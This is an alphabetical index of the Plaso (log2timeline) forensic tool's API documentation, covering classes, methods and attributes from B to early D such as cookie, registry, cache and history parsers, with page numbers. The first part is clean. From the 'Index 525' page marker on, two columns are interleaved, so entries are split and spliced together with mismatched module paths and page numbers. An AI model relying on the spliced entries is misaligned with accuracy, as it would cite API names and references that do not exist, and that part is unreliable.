background_number_for_read_operations (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData attribute), 225
background_number_for_write_operations (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData attribute), 225
BackgroundActivityModeratorEventData (class in plaso.parsers.winreg_plugins.bam), 323
BackgroundActivityModeratorWindowsRegistryPlugin (class in plaso.parsers.winreg_plugins.bam), 323
backup_id (plaso.parsers.symantec.SymantecEventData attribute), 436
BadConfigObject, 180
BadConfigOption, 180
BagMRUEventData (class in plaso.parsers.winreg_plugins.bagmru), 322
BagMRUWindowsRegistryPlugin (class in plaso.parsers.winreg_plugins.bagmru), 322
BaseAnalyzer (class in plaso.analyzers.interface), 59
BaseChromeCookiePlugin (class in plaso.parsers.sqlite_plugins.chrome_cookies), 249
BaseCookiePlugin (class in plaso.parsers.cookie_plugins.interface), 215
BaseEngine (class in plaso.engine.engine), 127
BaseFileEntryFilter (class in plaso.parsers.interface), 381
BaseFirefoxCacheParser (class in plaso.parsers.firefox_cache), 373
BaseGoogleChromeHistoryPlugin (class in plaso.parsers.sqlite_plugins.chrome_history), 253
BaseHasher (class in plaso.analyzers.hashers.interface), 55
BaseMRUListExWindowsRegistryPlugin (class in plaso.parsers.winreg_plugins.mrulistex), 331
BaseMRUListWindowsRegistryPlugin (class in plaso.parsers.winreg_plugins.mrulist), 329
BaseParser (class in plaso.parsers.interface), 382
BasePlugin (class in plaso.parsers.plugins), 411
BasePluginCache (class in plaso.parsers.plugins), 412
BaseStore (class in plaso.storage.interface), 495
BaseTableView (class in plaso.cli.views), 95
BaseWindowsRegistryKeyFilter (class in plaso.parsers.winreg_plugins.interface), 325
BashHistoryEventData (class in plaso.parsers.bash_history), 358
BashHistoryParser (class in plaso.parsers.bash_history), 358
BasicEventFormatter (class in plaso.formatters.interface), 169
BencodeFile (class in plaso.parsers.bencode_parser), 359
BencodeParser (class in plaso.parsers.bencode_parser), 359
BencodePlugin (class in plaso.parsers.bencode_plugins.interface), 211
BencodeValues (class in plaso.parsers.bencode_parser), 360
BINARY_DATA_COLUMN_TYPES (plaso.parsers.esedb_plugins.interface.ESEDBPlugin attribute), 220
binary_path (plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorEventData attribute), 323
BinaryCookieParser (class in plaso.parsers.safari_cookies), 418
BinaryDSVReader (class in plaso.lib.line_reader_file), 182
BinaryExpression (class in plaso.filters.expressions), 156
BinaryLineReader (class in plaso.lib.line_reader_file), 182
BinaryOperator (class in plaso.filters.filters), 160
birth_droid_file_identifier (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventData attribute), 228
birth_droid_file_identifier (plaso.parsers.winlnk.WinLnkLinkEventData attribute), 461
birth_droid_volume_identifier (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventData attribute), 228
birth_droid_volume_identifier (plaso.parsers.winlnk.WinLnkLinkEventData attribute), 461
birthday (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventData attribute), 300
BLANK (plaso.parsers.iis.WinIISParser attribute), 380
block_mode (plaso.parsers.trendmicroav.TrendMicroUrlEventData attribute), 450
block_number (plaso.parsers.chrome_cache.CacheAddress attribute), 361
block_offset (plaso.parsers.chrome_cache.CacheAddress attribute), 361
block_size (plaso.parsers.chrome_cache.CacheAddress attribute), 361
BluetoothPlugin (class in plaso.parsers.plist_plugins.bluetooth), 233
body (plaso.parsers.dpkg.DpkgEventData attribute), 369
body (plaso.parsers.selinux.SELinuxLogEventData attribute), 426
body (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventData attribute), 243
body (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageData attribute), 270
body (plaso.parsers.sqlite_plugins.kik_ios.KikIOSMessageEventData attribute), 276
body (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventData attribute), 288
body (plaso.parsers.syslog.SyslogCommentEventData attribute), 441
body (plaso.parsers.syslog.SyslogLineEventData attribute), 442
body (plaso.parsers.systemd_journal.SystemdJournalEventData attribute), 444
BooleanEventFormatterHelper (class in plaso.formatters.interface), 170
BootExecutePlugin (class in plaso.parsers.winreg_plugins.lfu), 327
BootVerificationPlugin (class in plaso.parsers.winreg_plugins.lfu), 327
BrowserSearchPlugin (class in plaso.analysis.browser_search), 39
bsd_name (plaso.parsers.santa.SantaMountEventData attribute), 421
BSMEventData (class in plaso.parsers.bsm), 360
BSMParser (class in plaso.parsers.bsm), 360
BUFFER_SIZE (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogParser attribute), 376
BUFFER_SIZE (plaso.parsers.sccm.SCCMParser attribute), 424
BUFFER_SIZE (plaso.parsers.text_parser.PyparsingMultiLineTextParser attribute), 447
build_number (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventData attribute), 349
BuildArtifactsRegistry() (plaso.engine.engine.BaseEngine class method), 127
BuildCollectionFilters() (plaso.engine.engine.BaseEngine method), 127
BuildFindSpecs() (plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelper method), 123
BuildFindSpecs() (plaso.engine.path_filters.PathCollectionFiltersHelper method), 135
bundle_id (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventData attribute), 248
bundle_identifier (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCApplicationEventData attribute), 284
bundle_identifier (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCSafariEventData attribute), 286
bundle_name (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventData attribute), 288
bus (plaso.parsers.santa.SantaMountEventData attribute), 421
bytes_received (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventData attribute), 226
bytes_sent (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventData attribute), 226

C

cache_directory_index (plaso.parsers.msiecf.MSIECFLeakEventData attribute), 401
cache_directory_index (plaso.parsers.msiecf.MSIECFURLEventData attribute), 402
cache_directory_name (plaso.parsers.msiecf.MSIECFLeakEventData attribute), 401
cache_directory_name (plaso.parsers.msiecf.MSIECFURLEventData attribute), 402
cache_identifier (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData attribute), 221
CacheAddress (class in plaso.parsers.chrome_cache), 361
cached_file_size (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData attribute), 221
cached_file_size (plaso.parsers.msiecf.MSIECFLeakEventData attribute), 401
cached_file_size (plaso.parsers.msiecf.MSIECFURLEventData attribute), 402
cached_filename (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData attribute), 221
cached_filename (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheLeakFilesEventData attribute), 223
cached_filename (plaso.parsers.msiecf.MSIECFLeakEventData attribute), 401
cached_filename (plaso.parsers.msiecf.MSIECFURLEventData attribute), 402
CacheEntry (class in plaso.parsers.chrome_cache), 361
CacheQueryResults() (plaso.parsers.sqlite.SQLiteCache method), 434
call_type (plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventData attribute), 240
CALL_TYPE (plaso.parsers.sqlite_plugins.android_calls.AndroidCallPlugin attribute), 240

call_type (plaso.parsers.sqlite_plugins.skype.SkypeCallEventData attribute), 295
caller (plaso.parsers.mac_securityd.MacOSSecuritydLogEventData attribute), 389
CallFunction() (plaso.multi_process.plaso_xmlrpc.XMLRPCClient method), 190
CallFunction() (plaso.multi_process.rpc.RPCClient method), 191
caption (plaso.parsers.bencode_plugins.utorrent.UTorrentEventData attribute), 213
case_sensitive (plaso.containers.artifacts.EnvironmentVariableArtifact attribute), 98
cat (plaso.parsers.symantec.SymantecEventData attribute), 437
CATEGORY (plaso.cli.helpers.dynamic_output.DynamicOutputArgumentsHelper attribute), 65
CATEGORY (plaso.cli.helpers.elastic_output.ElasticSearchOutputArgumentsHelper attribute), 66
CATEGORY (plaso.cli.helpers.elastic_ts_output.ElasticTimesketchOutputArgumentsHelper attribute), 66
CATEGORY (plaso.cli.helpers.interface.ArgumentsHelper attribute), 69
CATEGORY (plaso.cli.helpers.nsrlsvr_analysis.NsrlsvrAnalysisArgumentsHelper attribute), 71
CATEGORY (plaso.cli.hel
pers.sessionize_analysis.SessionizeAnalysisArgumentsHelper attribute), 75
CATEGORY (plaso.cli.helpers.tagging_analysis.TaggingAnalysisArgumentsHelper attribute), 76
CATEGORY (plaso.cli.helpers.viper_analysis.ViperAnalysisArgumentsHelper attribute), 79
CATEGORY (plaso.cli.helpers.virustotal_analysis.VirusTotalAnalysisArgumentsHelper attribute), 79
CATEGORY (plaso.cli.helpers.windows_services_analysis.WindowsServicesAnalysisArgumentsHelper attribute), 80
CATEGORY (plaso.cli.helpers.xlsx_output.XLSXOutputArgumentsHelper attribute), 81
category_message_files (plaso.containers.artifacts.WindowsEventLogProviderArtifact attribute), 103
CCleanerConfigurationEventData (class in plaso.parsers.winreg_plugins.ccleaner), 323
CCleanerPlugin (class in plaso.parsers.winreg_plugins.ccleaner), 324
CCleanerUpdateEventData (class in plaso.parsers.winreg_plugins.ccleaner), 324
certificate_common_name (plaso.parsers.santa.SantaExecutionEventData attribute), 419
certificate_hash (plaso.parsers.santa.SantaExecutionEventData attribute), 419
CheckDependencies() (in module plaso.dependencies), 505
CheckFilterExpression() (plaso.parsers.manager.ParsersManager class method), 393
CheckKeyCompatibility() (plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelper class method), 123
CheckOutDated() (plaso.cli.tools.CLITool method), 93
CheckPath() (plaso.filters.path_filter.PathFilterScanTree method), 165
CheckRequiredKeys() (plaso.parsers.bencode_plugins.interface.BencodePlugin method), 211
CheckRequiredPaths() (plaso.parsers.czip_plugins.interface.CompoundZIPPlugin method), 216
CheckRequiredTables() (plaso.parsers.esedb_plugins.interface.ESEDBPlugin method), 220
CheckRequiredTablesAndColumns() (plaso.parsers.sqlite_plugins.interface.SQLitePlugin method), 275
CheckSchema() (plaso.parsers.sqlite_plugins.interface.SQLitePlugin method), 276
CheckStorageFileHasSupportedFormat() (plaso.storage.factory.StorageFactory class method), 493
CheckSupportedFormat() (plaso.storage.sqlite.sqlite_file.SQLiteStorageFile class method), 489
CheckTaskToMerge() (plaso.multi_process.task_manager.TaskManager method), 192
Chrome17CookiePlugin (class in plaso.parsers.sqlite_plugins.chrome_cookies), 249
Chrome66CookiePlugin (class in plaso.parsers.sqlite_plugins.chrome_cookies), 250
ChromeAutofillEventData (class in plaso.parsers.sqlite_plugins.chrome_autofill), 248
ChromeAutofillPlugin (class in plaso.parsers.sqlite_plugins.chrome_autofill), 248
ChromeCacheDataBlockFileParser (class in plaso.parsers.chrome_cache), 362
ChromeCacheEntryEventData (class in plaso.parsers.chrome_cache), 362
ChromeCacheIndexFileParser (class in plaso.parsers.chrome_cache), 362
ChromeCacheParser (class in plaso.parsers.chrome_cache), 363
ChromeContentSettingsExceptionsEventData (class in plaso.parsers.chrome_preferences), 363
ChromeCookieEventData (class in plaso.parsers.sqlite_plugins.chrome_cookies), 250
ChromeExtensionActivityEventData (class in plaso.parsers.sqlite_plugins.chrome_extension_activity), 251
ChromeExtensionActivityPlugin (class in plaso.parsers.sqlite_plugins.chrome_extension_activity), 252
ChromeExtensionInstallationEventData (class in plaso.parsers.chrome_preferences), 364
ChromeExtensionPlugin (class in plaso.analysis.chrome_extension), 40
ChromeExtensionsAutoupdaterEventData (class in plaso.parsers.chrome_preferences), 364
ChromeHistoryFileDownloadedEventData (class in plaso.parsers.sqlite_plugins.chrome_history), 253
ChromeHistoryPageVisitedEventData (class in plaso.parsers.sqlite_plugins.chrome_history), 254
ChromeHistoryTypedCountFormatterHelper (class in plaso.formatters.chrome), 167
ChromePreferencesClearHistoryEventData (class in plaso.parsers.chrome_preferences), 364
ChromePreferencesParser (class in plaso.parsers.chrome_preferences), 364
ChromePreferencesPrimaryURLFormatterHelper (class in plaso.formatters.chrome_preferences), 167
ChromePreferencesSecondaryURLFormatterHelper (class in plaso.formatters.chrome_preferences), 167
CircularBuffer (class in plaso.lib.bufferlib), 178
cleaninfo (plaso.parsers.symantec.SymantecEventData attribute), 437
Clear() (plaso.lib.bufferlib.CircularBuffer method), 178
ClearParserChain() (plaso.parsers.mediator.ParserMediator method), 397
client (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntry attribute), 291
clientgroup (plaso.parsers.symantec.SymantecEventData attribute), 437
CLIInputReader (class in plaso.cli.tools), 93
CLIOutputWriter (class in plaso.cli.tools), 93
CLITableView (class in plaso.cli.views), 96
CLITabularTableView (class in plaso.cli.views), 96
CLITool (class in plaso.cli.tools), 93
Close() (plaso.engine.plaso_queue.Queue method), 137
Close() (plaso.engine.zeromq_queue.ZeroMQBufferedQueue method), 149
Close() (plaso.engine.zeromq_queue.ZeroMQQueue method), 152
Close() (plaso.formatters.winevt_rc.Sqlite3DatabaseFile method), 175
Close() (plaso.formatters.winevt_rc.Sqlite3DatabaseReader method), 175
Close() (plaso.multi_process.plaso_xmlrpc.XMLRPCClient method), 191
Close() (plaso.multi_process.rpc.RPCClient method), 191
Close() (plaso.output.interface.OutputModule method), 197
Close() (plaso.output.interface.TextFileOutputModule method), 198
Close() (plaso.output.shared_elastic.SharedElasticsearchOutputModule method), 207
Close() (plaso.output.xlsx.XLSXOutputModule method), 210
Close() (plaso.parsers.bencode_parser.BencodeFile method), 359
Close() (plaso.parsers.esedb.ESEDatabase method), 371
Close() (plaso.parsers.sqlite.SQLiteDatabase method), 435
Close() (plaso.storage.fake.fake_store.FakeStore method), 480
Close() (plaso.storage.interface.BaseStore method), 496
Close() (plaso.storage.merge_reader.StorageMergeReader method), 498
Close() (plaso.storage.reader.StorageReader method), 499
Close() (plaso.storage.redis.redis_store.RedisStore method), 484
Close() (plaso.storage.sqlite.sqlite_file.SQLiteStorageFile method), 489
Close() (plaso.storage.writer.StorageWriter method), 501
CLOUD_PATH_CACHE_QUERY (plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin attribute), 267
code_page (plaso.containers.artifacts.SystemConfigurationArtifact attribute), 101
codepage (plaso.engine.knowledge_base.KnowledgeBase property), 134
codepage (plaso.parsers.mediator.ParserMediator property), 400
Collect() (plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin method), 470
Collect() (plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin method), 470
Collect() (plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin method), 470
Collect() (plaso.preprocessors.windows.WindowsAllUsersAppDataKnowledgeBasePlugin method), 475
Collect() (plaso.preprocessors.windows.WindowsAllUsersAppProfileKnowledgeBasePlugin method), 475


Collect() (plaso.preprocessors.windows.WindowsProgramDataKnowledgeBasePlugin method), 477
CollectFromFileSystem() (plaso.preprocessors.manager.PreprocessPluginsManager class method), 473
CollectFromKnowledgeBase() (plaso.preprocessors.manager.PreprocessPluginsManager class method), 473
CollectFromWindowsRegistry() (plaso.preprocessors.manager.PreprocessPluginsManager class method), 473
collection_filters_helper (plaso.engine.engine.BaseEngine attribute), 127
collection_filters_helper (plaso.parsers.mediator.ParserMediator attribute), 397
CollectionFiltersHelper (class in plaso.engine.filters_helper), 130
COLUMNS (plaso.parsers.dsv_parser.DSVParser attribute), 370
columns (plaso.parsers.mac_keychain.KeychainDatabaseTable attribute), 387
COLUMNS (plaso.parsers.mcafeeav.McafeeAccessProtectionParser attribute), 396
COLUMNS (plaso.parsers.networkminer.NetworkMinerParser attribute), 404
COLUMNS (plaso.parsers.symantec.SymantecParser attribute), 441
COLUMNS (plaso.parsers.trendmicroav.OfficeScanVirusDetectionParser attribute), 448
COLUMNS (plaso.parsers.trendmicroav.OfficeScanWebReputationParser attribute), 449
COLUMNS (plaso.parsers.trendmicroav.TrendMicroBaseParser attribute), 450
command (plaso.parsers.apt_history.APTHistoryLogEventData attribute), 355
command (plaso.parsers.bash_history.BashHistoryEventData attribute), 358
command (plaso.parsers.docker.DockerJSONLayerEventData attribute), 368
command (plaso.parsers.syslog_plugins.cron.CronTaskRunEventData attribute), 316
command (plaso.parsers.winreg_plugins.winlogon.WinlogonEventData attribute), 350
command (plaso.parsers.zsh_extended_history.ZshHistoryEventData attribute), 469
command_line_arguments (plaso.containers.sessions.Session attribute), 112
command_line_arguments (plaso.containers.sessions.SessionConfiguration attribute), 115
command_line_arguments (plaso.parsers.winlnk.WinLnkLinkEventData attribute), 461
COMMENT (plaso.parsers.iis.WinIISParser attribute), 380
COMMENT_LINE_HASH (plaso.parsers.text_parser.PyparsingConstants attribute), 446
comments (plaso.parsers.mac_keychain.KeychainApplicationRecordEventData attribute), 386
comments (plaso.parsers.mac_keychain.KeychainInternetRecordEventData attribute), 387
comments (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventData attribute), 339
company_name (plaso.parsers.winreg_plugins.amcache.AMCacheFileEventData attribute), 318
COMPARE_EXCLUDE (plaso.analysis.windows_services.WindowsService attribute), 53
compare_storage_information (plaso.cli.pinfo_tool.PinfoTool attribute), 85
CompareExpression() (plaso.filters.expression_parser.Token method), 155
CompareStores() (plaso.cli.pinfo_tool.PinfoTool method), 86
Compile() (plaso.filters.expressions.BinaryExpression method), 156
Compile() (plaso.filters.expressions.EventExpression method), 156
Compile() (plaso.filters.expressions.Expression method), 157
Compile() (plaso.filters.expressions.IdentityExpression method), 157
compiled_re (plaso.filters.filters.Regexp attribute), 163
CompileFilter() (plaso.filters.event_filter.EventObjectFilter method), 154
CompileReport() (plaso.analysis.browser_search.BrowserSearchPlugin method), 39
CompileReport() (plaso.analysis.chrome_extension.ChromeExtensionPlugin method), 40
CompileReport() (plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin method), 42
CompileReport() (plaso.analysis.interface.AnalysisPlugin method), 43
CompileReport() (plaso.analysis.sessionize.SessionizeAnalysisPlugin method), 48
CompileReport() (plaso.analysis.test_memory.TestMemoryAnalysisPlugin method), 49
CompileReport() (plaso.analysis.windows_services.WindowsServicesAnalysisPlugin method), 54
CompleteTask() (plaso.multi_process.task_manager.TaskManager method), 192
completion_time (plaso.containers.sessions.Session attribute), 112
completion_time (plaso.containers.tasks.Task attribute), 117

Index 525 Plaso (log2timeline), Release 20210606

component (plaso.parsers.android_app_usage.AndroidAppUsageEventDataattribute), 98 attribute), 352 CONTAINER_TYPE (plaso.containers.artifacts.OperatingSystemArtifact component (plaso.parsers.sccm.SCCMLogEventData at- attribute), 99 tribute), 424 CONTAINER_TYPE (plaso.containers.artifacts.PathArtifact CompoundZIPParser (class in plaso.parsers.czip), 367 attribute), 99 CompoundZIPPlugin (class in CONTAINER_TYPE (plaso.containers.artifacts.SourceConfigurationArtifact plaso.parsers.czip_plugins.interface), 216 attribute), 101 compressed (plaso.parsers.symantec.SymantecEventData CONTAINER_TYPE (plaso.containers.artifacts.SystemConfigurationArtifact attribute), 437 attribute), 102 CompressedFileHandler (class in plaso.lib.loggers), CONTAINER_TYPE (plaso.containers.artifacts.TimeZoneArtifact 183 attribute), 102 compression_format (plaso.storage.sqlite.sqlite_file.SQLiteStorageFileCONTAINER_TYPE (plaso.containers.artifacts.UserAccountArtifact attribute), 489 attribute), 103 computer (plaso.parsers.symantec.SymantecEventData CONTAINER_TYPE (plaso.containers.artifacts.WindowsEventLogProviderArtifact attribute), 437 attribute), 103 computer_name (plaso.parsers.asl.ASLEventData CONTAINER_TYPE (plaso.containers.event_sources.EventSource attribute), 356 attribute), 104 computer_name (plaso.parsers.cups_ipp.CupsIppEventDataCONTAINER_TYPE (plaso.containers.events.EventData at- attribute), 365 tribute), 105 computer_name (plaso.parsers.mac_appfirewall.MacAppFirewallLogEventDataCONTAINER_TYPE (plaso.containers.events.EventDataStream attribute), 385 attribute), 106 computer_name (plaso.parsers.winevt.WinEvtRecordEventDataCONTAINER_TYPE (plaso.containers.events.EventObject attribute), 455 attribute), 106 computer_name (plaso.parsers.winevtx.WinEvtxRecordEventDataCONTAINER_TYPE (plaso.containers.events.EventTag at- attribute), 457 tribute), 107 ConditionalEventFormatter (class in CONTAINER_TYPE (plaso.containers.interface.AttributeContainer plaso.formatters.interface), 170 attribute), 
108 configuration (plaso.parsers.winreg_plugins.ccleaner.CCleanerConfigurationEventDataCONTAINER_TYPE (plaso.containers.reports.AnalysisReport attribute), 323 attribute), 111 configuration (plaso.parsers.winreg_plugins.timezone.WindowsTimezoneSettingsEventDataCONTAINER_TYPE (plaso.containers.sessions.Session at- attribute), 345 tribute), 113 ConfigureLogging() (in module plaso.lib.loggers), 183 CONTAINER_TYPE (plaso.containers.sessions.SessionCompletion connection_type (plaso.parsers.winreg_plugins.networks.WindowsRegistryNetworkListEventDataattribute), 114 attribute), 335 CONTAINER_TYPE (plaso.containers.sessions.SessionConfiguration ConnectionError, 180 attribute), 115 ContainedIn() (plaso.containers.artifacts.PathArtifact CONTAINER_TYPE (plaso.containers.sessions.SessionStart method), 99 attribute), 116 container_id (plaso.parsers.docker.DockerJSONContainerEventDataCONTAINER_TYPE (plaso.containers.storage_media.MountPoint attribute), 367 attribute), 117 container_id (plaso.parsers.docker.DockerJSONContainerLogEventDataCONTAINER_TYPE (plaso.containers.tasks.Task attribute), attribute), 367 118 container_identifier CONTAINER_TYPE (plaso.containers.tasks.TaskCompletion (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 119 attribute), 221 CONTAINER_TYPE (plaso.containers.tasks.TaskStart at- container_identifier tribute), 119 (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainersEventDataCONTAINER_TYPE (plaso.containers.warnings.AnalysisWarning attribute), 222 attribute), 120 container_name (plaso.parsers.docker.DockerJSONContainerEventDataCONTAINER_TYPE (plaso.containers.warnings.ExtractionWarning attribute), 367 attribute), 120 CONTAINER_TYPE (plaso.containers.analyzer_result.AnalyzerResultCONTAINER_TYPE (plaso.containers.warnings.PreprocessingWarning attribute), 97 attribute), 121 CONTAINER_TYPE (plaso.containers.artifacts.EnvironmentVariableArtifactCONTAINER_TYPE (plaso.containers.warnings.RecoveryWarning attribute), 
98 attribute), 121 CONTAINER_TYPE (plaso.containers.artifacts.HostnameArtifactCONTAINER_TYPE (plaso.engine.configurations.CredentialConfiguration

526 Index Plaso (log2timeline), Release 20210606

attribute), 123 (plaso.containers.sessions.Session method), CONTAINER_TYPE (plaso.engine.configurations.EventExtractionConfiguration113 attribute), 124 CopyAttributesFromSessionStart() CONTAINER_TYPE (plaso.engine.configurations.ExtractionConfiguration(plaso.containers.sessions.Session method), attribute), 124 113 CONTAINER_TYPE (plaso.engine.configurations.ProcessingConfigurationCopyFromDict() (plaso.containers.interface.AttributeContainer attribute), 125 method), 108 CONTAINER_TYPE (plaso.engine.configurations.ProfilingConfigurationCopyTextToLabel() (plaso.containers.events.EventTag attribute), 126 class method), 107 Contains (class in plaso.filters.filters), 161 CopyToDict() (plaso.containers.events.EventTag content (plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkAnnotationEventDatamethod), 107 attribute), 265 CopyToDict() (plaso.containers.interface.AttributeContainer content (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventDatamethod), 108 attribute), 307 CopyToDict() (plaso.containers.reports.AnalysisReport content_length (plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCacheEventDatamethod), 111 attribute), 246 CopyToPath() (plaso.parsers.shared.shell_items.ShellItemsParser content_type (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemEventDatamethod), 239 attribute), 433 CopyToString() (plaso.containers.interface.AttributeContainerIdentifier conversation_identifier method), 109 (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidConversationEventDataCopyToString() (plaso.storage.identifiers.FakeIdentifier attribute), 300 method), 494 ConvertTokenToInteger() (in module CopyToString() (plaso.storage.identifiers.RedisKeyIdentifier plaso.parsers.text_parser), 445 method), 495 cookie_name (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventDataCopyToString() (plaso.storage.identifiers.SQLTableIdentifier attribute), 213 method), 495 COOKIE_NAME 
(plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmaPlugincount (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventData attribute), 214 attribute), 248 COOKIE_NAME (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmbPlugincountry (plaso.parsers.sqlite_plugins.skype.SkypeAccountEventData attribute), 214 attribute), 294 COOKIE_NAME (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmtPluginCPUTimeMeasurement (class in plaso.engine.profilers), attribute), 214 145 COOKIE_NAME (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmzPluginCPUTimeProfiler (class in plaso.engine.profilers), 145 attribute), 215 CreateAttributeContainer() COOKIE_NAME (plaso.parsers.cookie_plugins.interface.BaseCookiePlugin(plaso.containers.manager.AttributeContainersManager attribute), 215 class method), 109 cookie_name (plaso.parsers.safari_cookies.SafariBinaryCookieEventDataCreateRetryTask() (plaso.containers.tasks.Task attribute), 418 method), 118 cookie_name (plaso.parsers.sqlite_plugins.android_webview.WebViewCookieEventDataCreateRetryTask() (plaso.multi_process.task_manager.TaskManager attribute), 245 method), 193 cookie_name (plaso.parsers.sqlite_plugins.chrome_cookies.ChromeCookieEventDataCreateSession() (plaso.engine.engine.BaseEngine attribute), 250 class method), 127 cookie_name (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookieEventDataCreateSessionCompletion() attribute), 259 (plaso.containers.sessions.Session method), cookie_value (plaso.parsers.safari_cookies.SafariBinaryCookieEventData113 attribute), 418 CreateSessionConfiguration() CookiePluginsManager (class in (plaso.containers.sessions.Session method), plaso.parsers.cookie_plugins.manager), 113 216 CreateSessionStart() copies (plaso.parsers.cups_ipp.CupsIppEventData at- (plaso.containers.sessions.Session method), tribute), 365 114 CopyAttributesFromSessionCompletion() CreateSignatureScanner() (plaso.containers.sessions.Session method), (plaso.parsers.manager.ParsersManager 
113 class method), 393 CopyAttributesFromSessionConfiguration() CreateStorageFile()

Index 527 Plaso (log2timeline), Release 20210606

(plaso.storage.factory.StorageFactory class CupsIppEventData (class in plaso.parsers.cups_ipp), method), 493 365 CreateStorageReaderForFile() CupsIppParser (class in plaso.parsers.cups_ipp), 366 (plaso.storage.factory.StorageFactory class custom_helpers (plaso.formatters.interface.BasicEventFormatter method), 493 attribute), 169 CreateStorageWriter() custom_helpers (plaso.formatters.interface.EventFormatter (plaso.storage.factory.StorageFactory class attribute), 172 method), 493 CustomDestinationsParser (class in CreateStorageWriterForFile() plaso.parsers.custom_destinations), 366 (plaso.storage.factory.StorageFactory class CustomEventFormatterHelper (class in method), 493 plaso.formatters.interface), 171 CreateTask() (plaso.multi_process.task_manager.TaskManager method), 193 D CreateTaskCompletion() (plaso.containers.tasks.Task danger_type (plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryFileDownloadedEventData method), 118 attribute), 253 CreateTaskStart() (plaso.containers.tasks.Task data (plaso.parsers.sqlite_plugins.android_webview.WebViewCookieEventData method), 118 attribute), 245 CreateTaskStorageReader() data (plaso.parsers.sqlite_plugins.chrome_cookies.ChromeCookieEventData (plaso.storage.factory.StorageFactory class attribute), 251 method), 494 data (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookieEventData CreateTaskStorageWriter() attribute), 259 (plaso.storage.factory.StorageFactory class data (plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantineEventData method), 494 attribute), 281 creating_app (plaso.parsers.czip_plugins.oxml.OpenXMLEventDataDATA_FILE (plaso.parsers.olecf.OLECFParser at- attribute), 217 tribute), 407 creation_time (plaso.parsers.chrome_cache.CacheEntry DATA_FORMAT (plaso.parsers.android_app_usage.AndroidAppUsageParser attribute), 361 attribute), 352 creation_time (plaso.parsers.chrome_cache.ChromeCacheIndexFileParserDATA_FORMAT (plaso.parsers.apache_access.ApacheAccessParser attribute), 363 attribute), 354 
credential_data (plaso.engine.configurations.CredentialConfigurationDATA_FORMAT (plaso.parsers.apt_history.APTHistoryLogParser attribute), 123 attribute), 355 credential_type (plaso.engine.configurations.CredentialConfigurationDATA_FORMAT (plaso.parsers.asl.ASLParser attribute), attribute), 123 357 CredentialConfiguration (class in DATA_FORMAT (plaso.parsers.bash_history.BashHistoryParser plaso.engine.configurations), 123 attribute), 358 credentials (plaso.engine.configurations.ProcessingConfigurationDATA_FORMAT (plaso.parsers.bencode_parser.BencodeParser attribute), 124 attribute), 359 credibility_rating (plaso.parsers.trendmicroav.TrendMicroUrlEventDataDATA_FORMAT (plaso.parsers.bencode_plugins.interface.BencodePlugin attribute), 450 attribute), 211 credibility_score (plaso.parsers.trendmicroav.TrendMicroUrlEventDataDATA_FORMAT (plaso.parsers.bencode_plugins.transmission.TransmissionBencodePlugin attribute), 450 attribute), 212 CronSyslogPlugin (class in DATA_FORMAT (plaso.parsers.bencode_plugins.utorrent.UTorrentBencodePlugin plaso.parsers.syslog_plugins.cron), 316 attribute), 212 CronTaskRunEventData (class in DATA_FORMAT (plaso.parsers.bsm.BSMParser attribute), plaso.parsers.syslog_plugins.cron), 316 360 cs_cookie (plaso.parsers.iis.IISEventData attribute), DATA_FORMAT (plaso.parsers.chrome_cache.ChromeCacheParser 378 attribute), 363 cs_host (plaso.parsers.iis.IISEventData attribute), 378 DATA_FORMAT (plaso.parsers.chrome_preferences.ChromePreferencesParser cs_referrer (plaso.parsers.iis.IISEventData attribute), attribute), 364 378 DATA_FORMAT (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsUtmaPlugin cs_uri_query (plaso.parsers.iis.IISEventData at- attribute), 214 tribute), 378 DATA_FORMAT 